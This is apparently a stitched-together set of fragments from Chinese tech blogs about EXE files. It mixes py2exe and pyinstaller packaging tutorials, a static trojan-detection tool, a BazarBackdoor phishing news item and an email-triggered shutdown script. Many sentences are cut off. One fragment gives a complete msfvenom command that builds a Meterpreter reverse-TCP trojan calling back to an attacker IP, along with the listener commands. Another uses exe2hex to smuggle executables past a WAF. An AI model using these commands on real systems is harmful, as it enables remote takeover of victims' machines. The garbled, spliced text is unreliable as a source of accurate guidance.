然而,一些不法分子利用用户对娱乐的需求,将木马程序隐藏在看似正常的小游戏 EXE 文件中,给用户的电脑安全带来了严重威胁。 二、EXE 文件携带木马的隐藏方式(一)代码混淆通过对木马代码进行混淆处理,使其难以被常规的安全检测工具识别和分析。(二)加壳技术使用加壳工具对木马程序进行封装,改变其特征码,逃避杀毒软件的查杀。 三、木马植入机制(一)自动运行在 EXE 文件被执行时,木马程序自动启动并尝试获取系统的管理员权限。(二)修改系统设置更改注册表、系统服务等设置,确保木马在系统启动时能够自动加载。 (二)物联网风险随着物联网设备的普及,EXE 文件携带的木马可能会扩展到智能设备领域,带来新的安全挑战。 (三)社交工程利用攻击者可能会更加巧妙地利用社交工程手段,诱使用户下载和运行携带木马的 EXE 文件。十、结论EXE 文件携带木马是一种严重的网络安全威胁,给个人和社会带来了巨大的风险和损失。
一、 核心功能(1)扫恶意字符串(如 keylogger、powershell)(2)查熵值异常(判断是否加密 / 加壳)(3)揪可疑 API 组合(像注册表篡改、网络通信链)(4)解析 PE 头(看编译环境 、系统兼容性、加壳痕迹)二、过程实战测了个可疑文件,刚用工具跑了 nimplant.exe,结果吓一跳:提示词:帮我写一个小型的木马静态特征查杀工具,用于检测windows下的exe可执行文件是否是可疑的木马 最后,测试我的exe程序:"D:\Tools\aipy20250411\aipy\nimplant.exe"。检测这个文件是不是恶意的木马。把写好的软件保存在项目文件夹下。 对于程序动态连接函数,Aipy 也能仔细排查出结果啦:扫出 426 个可疑字符串,含键盘记录、勒索关键词熵值超高(.rdata 节区 6.94),明显加密痕迹检测到注册表篡改 + 网络通信 API 组合,妥妥的木马行为结论 三、优势轻量:Python 脚本直接跑,不挑环境✨灵活:特征库可自定义,适合二次开发实用:样本初筛、应急响应都能用这次打造的PE文件查杀工具初战告捷,成功识别出恶意木马的多种特征,堪称静态分析的“小钢炮
py2exe可以将Python程序打包成exe程序,使得可以在没有Python环境的机器上运行。 # 为了打包成exe运行的时候能够看清楚,不会一闪而过 sleep(10) 下载py2exe: pip install py2exe 编写setup.py 文件: from distutils.core import setup import py2exe INCLUDES = ['hello_test'] options = { "py2exe "bundle_files": 1, # 1、2、3,1表示所有文件打包成一个exe文件,2表示除了Python的解释器外都绑定,3表示不绑定 "includes 然后使用python命令生成: python setup.py py2exe 然后在项目根目录会生成dist文件夹,里面就有刚打包好的exe程序: 双击启动: 版权声明
pyinstaller-dir\makespec.py --onefile src_dir\src.py (完了会生成src.spec) python pyinstaller_dir\build.py src.spec Step2:
1.py2 pip install py2exe from distutils.core import setup import py2exe setup(windows=[{"script": "123.py"}]) 2.py3 pip install pyinstaller win+r cmd+Enter cd C:/python/scripts pyinstaller.exe -F py you want to transport)/filename.py This report is only used to record my experience. 1. py2 pip安装py2exe from distutils.core import setup import py2exe setup(windows=[{"script": "123. exe – f (你想转换的py)/ filename.py 这个报告仅仅是用来记录我的经验。 版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。
scrollBar.config( command = text.yview ) scrollBar.grid(row=1,column=3) root.mainloop() 效果图:点击下拉菜单的”1“按钮 py2exe 可以将python程序转为exe程序: 首先下载py2exe:点击打开链接,然后安装它 然后在需要打包的py文件目录下新建一个setup.py,假设待带包的文件是tk.py #coding:utf-8 from distutils.core import setup import py2exe setup(windows=["tk.py"])#windows表示GUI程序,如果是控制台程序请将windows 替换为console,tk.py是待打包的文件 tk.py和setup.py在同一目录下:这样避免设置路径问题 然后cmd进入该目录,执行:python setup.py py2exe 执行成功后目录下会多一个 dist文件夹,dist文件夹下就有一个与pyhont脚本同名exe程序,点击这个exe即可运行 版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。
在公司用python写了个统计数据并通过xlsxwriter模块生成excel的小工具, 完成后使用py2exe转换成exe文件过程中遇到了些问题, 记录下. from distutils.core import setup import sys sys.argv.append('py2exe') # 直接执行python setup.py即可转换 includes = ['xlsxwriter'] options = { 'py2exe': { 'compressed': 1, 'optimized': 2, 文件 } } setup( option=options, zipfile=None, # 将生成的library.zip打包进exe文件 console=['_init_.py'] ) 转换过程中会提示找不到xlsxwriter模块, 查了下是因为py2exe还不支持egg模块的打包, 解决办法是将Python27\Lib\site-packages
exe2hexbat是一个 Python 脚本,用于将 Windows PE 可执行文件转换为批处理文件,反之亦然。 概述 exe2hex 将可执行二进制文件编码为 ASCII 文本格式。 可以使用exe2hex中的内置 Telnet 或 WinEXE 选项自动将文件传输到目标计算机。 -x chao.exe 可以看到,exe2hex将exe文件转变成了cmd和bat文件。 在创建 BATch 文件之前压缩文件 exe2hex -x chao.exe -b nc.txt -cc [*] exe2hex v1.5.1 [i] Attempting to clone and compress 由于部分机器的WAF会限制文件上传/下载exe。于是提出了一种使用exe2hex绕过这些防御机制的方法。将其转变为编码形式,最后再次构造 exe 并执行它。
multi/handlersetpayloadwindows/meterpreter/reverse_tcpsetLHOST192.168.186.46setLPORT4444exploit✅第一步:生成木马程序 展开代码语言:BashAI代码解释msfvenom-pwindows/meterpreter/reverse_tcpLHOST=192.168.186.46LPORT=4444-fexe-oiarc.exe 载荷LHOST=192.168.186.46攻击者的IP(即你Kali或监听机器的IP)LPORT=4444攻击者监听的端口(反向连接目标会连回这个端口)-fexe输出格式为Windows可执行文件(.exe )-oiarc.exe输出文件名为iarc.exe总结:这条命令会生成一个Windows木马程序iarc.exe,一旦在目标Windows机器上运行,它会主动连接回192.168.186.46:4444 ✅第五步:设置监听IP和端口展开代码语言:BashAI代码解释setLHOST192.168.186.46setLPORT4444这两行必须和生成木马时用的LHOST和LPORT完全一致,否则无法建立连接
1.py2exe下载 下载地址:https://www.lfd.uci.edu/~gohlke/pythonlibs/#lazyflow 搜索py2exe,在你搜索到的位置看到这样的条目 py2exe‑0.9.2.2‑cp34‑none‑win_amd64.whl 0.9.2.2:py2exe版本号;cp34:python版本号;win_amd64:系统位数 下载和你的python版本和系统位数相对应的py2exe版本 2.安装 下载好后在命令行下输入 pip install 下载文件绝对路比如你下载在C盘根目录,则输入: pip install double click. sys.argv.append('py2exe') py2exe_options = { "includes": ["sip"], # 如果打包文件中有 ': py2exe_options} ) 4.一些问题
使用pyinstaller ,真是受够了,各种bug,各种莫名其妙的情况,也是够了 使用py2exe,学习的时候麻烦,但是打包时候真的太方便了 安装py2exe,网址http://www.py2exe.org / 选择对应的版本下载; 撰写setup.py文件`# –– coding:utf-8-– import py2exe from distutils.core import setup setup( windows=[{“script”:’MergeJPG.py’, “icon_resources”: [(1, “earth.ico”)]}], options={“py2exe”: { “
py2exe是发布在开源许可证下的。 /py2exe/0.6.9/ 或者执行 easy_install py2exe-0.6.9.win32-py2.7.exe 通常情况下使用easy_install 下载并不好用,还是需要在官网下面下载下来 在官网下载的时候,要注意,选择合适的版本, 32位的下载 py2exe-0.6.9.win32-py2.7.exe 64位的下载py2exe-0.6.9.win64-py2.7.amd64.exe 默认情况下,py2exe在目录dist下创建以下这些必须的文件: 1、一个或多个exe文件。 2、python##.dll。 python setup.py py2exe --help easy_install py2exe-0.6.9.win32-py2.7.exe 版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人
使用native2ascii必须安装jdk。 查看jdk安装的路径:echo '%JAVA_HOME%' 进入jdk的bin目录: native2ascii.exe使用方法: 命令的语法格式: native2ascii -[options 举例: 把需要进行国际化的文件(如下图)拷贝到 C:\Program Files\Java\jdk1.6.0_31\bin 目录下, 应用native2ascii.exe工具进行转码。 ? 通过native2ascii命令转码成功后,如下图: ? 备注:native2ascii.exe是一个应用比较简单的转码工具,并且转码是可逆的。 试试如下命令: native2ascii -reverse new.txt yan.txt 结果: ?
背景只要运行业务,Windows云服务器就会自动关机windows server 2012 打开mirserver2目录下的 server2a.exe和GameCenter.exe,等待5分钟左右机器会关机 检查机器肯定没有人为关机,查看日志有记录关机 事件ID 6008 ,system日志看不到详细关机原因为什么会关机,是执行shutdown进行关机的吗,将shutdown.exe重名为其他文件名,测试启动业务还是会关机使用 Deployment Kit (ADK) 工具抓关机的进程,好处是即使关机了,(-filemode 参数也把日志写入文件),只需要选择 Windows Performance Toolkit 这个组件,安装 wpr.exe 和 wpa.exe下载 Windows Assessment and Deployment Kit (ADK):https://docs.microsoft.com/en-us/windows-hardware ”、“重启”、“Shutdown”、“Restart”、“Timeout”等相关的配置项,发现程序有保护机制,怀疑业务是商业软件,怀疑是被软件的 “反盗版机制” 直接强制关机,在GameCenter.exe
py2exe是发布在开源许可证下的。 二、安装py2exe从 http://prdownloads.sourceforge.net/py2exe下载并运行与你所安装的Python对应的py2exe版本的installer,这将安装py2exe 和相应的例子;这些例子被安装在lib\site-packages\py2exe\samples目录下。 mysetup.py,在其中的setup函数前插入语句import py2exe 。 默认情况下,py2exe在目录dist下创建 以下这些必须的文件: 1、一个或多个exe文件。 2、python##.dll。
据美国科技媒体BleepingComputer报道,一场新的网络钓鱼活动正在试图借助一种名为“BazarBackdoor”的新型后门木马来获取目标企业网络的完全访问权限。 图2.钓鱼邮件通过Sendgrid发送 诱饵文档可能是Word文档、Excel电子表格或PDF文件,且与钓鱼邮件的主题相对应。 例如,“新型冠状病毒”主题诱饵文档对应的文件名为“PreviewReport.DOC.exe”,“客户投诉”主题诱饵文档对应的文件名为“Preview.PDF.exe”。 在BleepingComputer的测试中,首个C2请求始终返回404 HTTP错误代码。 ? 图6.C2通信 但是,第二个C2请求将下载XOR加密的有效载荷,即BazarBackdoor后门木马。 图8.将后门注入svchost.exe 由于Windows任务管理中时刻都运行着大量的svchost.exe进程,因此大多数用户都不太可能会注意到什么时候多出了一个这样的进程,进而也就不会注意到后门的存在
HTML2EXE是一款windows系统下将Web项目或者是网站打包成EXE执行程序的免费工具。 当然任何网站也可以打包成EXE程序。 1、实现将Web前端或者网站地址打包转换成Windows32或者64的EXE执行程序。 2、所有的HTML、javascript、css程序代码以及网址都不会在电脑磁盘中出现。 11、使用微软最新WebView2(Chromium) 内核。保证兼容性和可靠性。 12、优化右键上下文菜单,禁用获取代码等菜单。 13、生成的目标EXE程序支持4K高清显示(H_DPI)及标清显示,程序界面不变形。 14、提供生成的目标EXE文件是否进行压缩选项,默认是压缩。 15、支持自定义右键菜单返回功能。
今天给大家分享的内容为: Python程序实现发送、读取邮件来控制电脑的关机与重启(作为py2exe打包成.exe可执行程序的基础文件) 一、代码实现 说明:本文介绍的是使用新浪邮箱作为例子进行讲解,代码实现如下 str2.append(x.decode()) except: try: str2.append(x.decode 0 elif biaoti2 == "restart": return 1 else: return 2 并休眠2秒后再次进行读取最 新一封邮件,如此循环往复; (3)、执行设备对象为:正在运行该程序的物理机器; 三、特别说明 1、该python文件需要导入的包模块,需自行先安装; 2、该程序可在python2 和python3环境下运行,此处代码是在python2环境下编写的,如果需要移植到python3环境下,需修改相应的语法; 3、后期内容将会讲解如何将该python程序使用py2exe打包成.exe可执行程序
今天给大家分享的内容为:使用py2exe将python程序打包成.exe可执行程序(未安装python运行环境的用户也可以运行该程序来实现远程发送邮件控制设备的关机与重启) 一、py2exe为一款python 程序打包工具,下载地址:https://sourceforge.net/projects/py2exe/files/,选择与之匹配的python版本,及电脑位数,如第三张截图所示 二、下载完成后安装 文件打包为.exe可执行程序(上篇)】 2、email_package.py文件内容如下: 注意点: (1)、该文件内容中不能出现中文; (2)、email_package.py和sendEmail.py ,运行状态如下截图所示: 四、基于上面sendEmail.exe程序启动后,发送一封邮件标题为:shutdown或restart的邮件至新浪邮箱,即推文:"py2exe实现python文件打包为.exe 程序每隔2秒会自动去读取该邮箱中的最新一封邮件,如果该邮件的标题为:shutdown或restart时,则会相对应的执行运行该.exe程序物理机器的关机与重启操作,否则:该.exe程序不会做任何操作,休眠
本文译自Py2exe官网 http://www.py2exe.org/ 简介 py2exe 是 Python Distutils 的一个外部扩展,它可以把Python脚本转为可执行的Windows程序 运行py2exe 的电脑需要安装Python ,因为py2exe 是一个 Python 程序并且它创建的包中包含Python 的一部分。 好信息是 py2exe 通常在这一步很少或者几乎没有什么障碍。你处理Python 的绝大部分方法同样适用于 py2exe,Pyhton有很多模块是和 py2exe 无缝连接的。 “py2exe” 是一个新的 Distutils 命令, 当你导入 py2exe时就会加载进来。 确保给出 py2exe 命令并且,将会看到很多很多输出: C:\Tutorial>python setup.py py2exe running py2exe *** searching for required